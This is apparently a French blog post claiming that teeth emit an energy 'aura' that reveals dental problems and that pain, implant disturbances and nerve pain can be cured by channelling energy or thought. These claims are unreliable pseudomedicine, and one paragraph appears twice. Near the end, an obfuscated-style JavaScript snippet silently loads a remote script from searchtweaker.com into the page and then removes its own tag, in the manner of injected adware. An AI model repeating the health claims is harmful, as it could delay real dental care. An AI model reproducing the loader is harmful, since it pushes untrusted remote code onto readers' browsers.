l'aura des dents
L'observation de la circulation énergétique des dents offre des indices très intéressants sur les problèmes dentaires avant même leur manifestation physique.
Toutes les dents émettent un signal énergétique dans la bouche ; ce signal peut être perçu par son intensité ou encore par des couleurs. L'intensité du signal énergétique me semble d'une lecture plus simple.
Les signes vitaux des dents
La qualité vibratoire de la mâchoire s'observe dans son ensemble, en haut puis en bas, à droite, à gauche, l'ordre n'a pas d'importance. on doit observer une belle harmonie, dans le ton et dans la force de l'aura des dents. La tonalité doit être relativement uniforme, quelque soit son intensité. La sensation de « force » est une appréciation. En principe, on ressent la vitalité de la dent, ce qui est suffisant pour estimer son état. L'absence de dent ne perturbe en rien l'harmonie de la mâchoire. La présence de couronne ne semble pas affecter l'ambiance énergétique, au contraire de l'implant qui la perturbe.
Le problème, son remède
Ce qu'il faut arriver à détecter, c'est une intensité légèrement différente, si elle existe. Quand on observe ce phénomène, on se concentrer sur la dent qui semble plus « terne » que les autres, afin de d'obtenir par le ressenti ce qui provoque ce trouble énergétique. Il n'est pas exclu d'en trouver plusieurs dans le même état, ailleurs. Le redressement du niveau vibratoire de la mâchoire s'obtient en faisant monter volontairement l'énergie dans la mâchoire, autour des dents jusqu'à l'intérieur de chaque dent. On observe plus facilement ce qui s'y passe, si l'on a pris le temps d'y repérer les problèmes énergétiques. Ce bain d'énergie ne prend en principe que quelques secondes, c'est suffisant.
Des trous dans « l'ambiance » énergétique de la mâchoire sont faciles à observer. Ce sont des zones qui permettent de soupçonner parfois une fuite d'énergie, comme une chambre à air percée. Elle peut survenir après un acte chirurgical, mais semble également relié à un problème émotionnel. Un lissage de l'énergie permet de « cautériser » la zone. Le problème émotionnel doit être compris pour en venir à bout.
La pose d'un implant dentaire est un acte chirurgical qui peut affecter l'harmonie de la mâchoire. Pour maintenir à peu près son équilibre, l'énergie tente avec plus ou moins de succès de faire des « ponts » permettant de relier entre elles les zones séparées. En cas d'échec, le problème semble se reporter sur la mobilité d'une zone du visage immédiatement à proximité de l'implant. Le redressement énergétique de la zone fait immédiatement disparaître le problème.
La pose d'un implant dentaire est un acte chirurgical qui peut affecter l'harmonie de la mâchoire. Pour maintenir à peu près son équilibre, l'énergie tente avec plus ou moins de succès de faire des « ponts » permettant de relier entre elles les zones séparées. En cas d'échec, le problème semble se reporter sur la mobilité d'une zone du visage immédiatement à proximité de l'implant. Le redressement énergétique de la zone fait immédiatement disparaître le problème.
Une dent « douloureuse » n'est pas forcément « malade » ; elle peut pendant quelques jours traverser un épisode de stress qu'il convient de résoudre par une attention adapter. On doit écarter une origine extérieure, ce qui peut nécessiter plusieurs jours sous surveillance. Dans le même temps, on focalise son attention sur cette dent pour la calmer. Cela nécessite une approche à la fois globale pour déterminer ce qui la gêne et locale pour apprécier l'évolution du problème. L'apport en énergie est fréquemment efficace.
Le fait de crisper souvent les dents tend à irriter les ligaments (en plus d'user l'émail). On s'en rend compte quand par un effort de la volonté, on se force à détendre sa mâchoire. L'apport en énergie accroît quelques secondes la sensation de ces tensions jusqu'au cœur de la dent ; il convient d'apporter de l'énergie jusqu'à la perte de toute sensation. il faut s'assurer par un balayage perceptif de l'absence de tensions.
Les muscles de la mâchoire
Ils sont très sensibles à l'apport d'énergie, et à la libération des tensions. Leurs contractions provoquent des tensions sur les ligaments autour de la dent. Ces tensions peuvent provoquer des irritations au niveau des ganglions et des nerfs trijumeaux (en plus de probables tensions cervicales). Il est essentiel de procéder comme dans le cas d'une relaxation. L'apport en énergie permet un apaisement des tensions en plus d'un relâchement ; la présence de picotements est caractéristique. Le relâchement doit être le plus profond possible pour lui trouver de l'efficacité dans le temps.
La douleur dentaire
Quelquefois, la douleur s'accompagne d'un battement. Par la méthode de relaxation de son choix, il convient d'accentuer son apaisement. Si la douleur persiste, il est nécessaire d'atteindre son foyer par la pensée puis de mobiliser son attention dans une volonté qui consiste à retirer la douleur. Parfois ça marche aussi si l'on y apporte de l'énergie. Au final, ça libère localement des endorphines et la douleur disparaît plus où moins subitement.
La douleur du nerf trijumeau sur l'avant de la mâchoire, à droite ou à gauche, demande qu'on s'intéresse aux tensions musculaires de la nuque.
- Un linge chaud appliqué sur la nuque. Renouveler souvent.
- Un massage doux à l'huile chaude, appliqué sur la nuque. La position est importante : le massage doit s'effectuer de préférence sans la douleur.
- Si ce n'est toujours pas suffisant, il s'agit d'abord de trouver la bonne position, un « point neutre » trouvé par le déplacement de la tête sur le côté jusqu'à ne plus rencontrer de douleur ; on peut s'aider de ses doigts pour tenter de localiser cette zone. Ensuite, il suffit de se plonger dans une profonde relaxation. Le relâchement volontaire est nécessaire (apprendre à se détendre aussi) ; il doit venir remplacer les tensions involontaires dues à son état d'être intérieur (stress), son mode de vie (stress) et la pression du quotidien (stress). Il ne faut pas s'attendre à un miracle, mais la douleur disparaîtra progressivement !
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Commentaires
Enregistrer un commentaire